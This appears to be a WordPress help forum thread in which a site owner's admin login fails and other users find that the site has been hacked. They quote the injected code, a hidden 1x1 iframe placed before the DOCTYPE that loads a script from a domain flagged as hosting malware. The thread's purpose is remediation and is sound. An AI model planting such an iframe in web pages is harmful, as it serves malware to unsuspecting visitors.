Is this a whitespace issue and where would I look for it?

Hi,

I was able to enter my WP admin area fine 2 days ago. Today, when entering

www.fingervibrator.org/wp-admin in Firefox, I got this strange error preventing me
from entering Wordpress:

Warning: Cannot modify header information - headers already sent by (output started at /home/gmr324ad/public_html/fingervibrator.org/wp-admin/index.php:3) in /home/gmr324ad/public_html/fingervibrator.org/wp-includes/pluggable.php on line 890

I Googled this and found out it could be related to whitespace, but didn’t see any in that
index.php file.

Any advice would be appreciated

George

Look at the source code in the browser. There’s an iframe that is printed before the document head.

I think you should check what’s going on in your entire site! When I visited your page I got a lot of warnings

Well, I just had an issue with the diskrepair virus yesterday on my laptop. On this particular site, I haven’t even installed a WP theme yet and am using the default one. I have no idea how that IFrame would have gotten in there. Commenting out that IFrame line did fix the problem. I’m just concerned about my site somehow being hacked and wouldn’t even know how to check for that.

As a matter of fact, trying to login to my wp-admin panel, there appears to be some sort of redirection like this:

http://fingervibrator.org/wp-login.php?redirect_to=http%3A%2F%2Fwww.fingervibrator.org%2Fwp-admin%2F&reauth=1

Is that normal?

If the site was hacked, I might just copy the content, delete the files and database, then start again from scratch. Since it looks like you haven’t done much to it yet, that’s probably easiest than trying to determine if there has been code embedded elsewhere.

“The website at www.fingervibrator.org contains elements from the site disreco.com, which appears to host malware”

That doesn’t look good.

You should get rid of that IFrame in front of your<! DOCTYPE>


<iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"></iframe><!DOCTYPE html>

I second (third?) the suggestion that the site has been hacked. As suggested, backup the content, wipe the folders and DB there, and start again.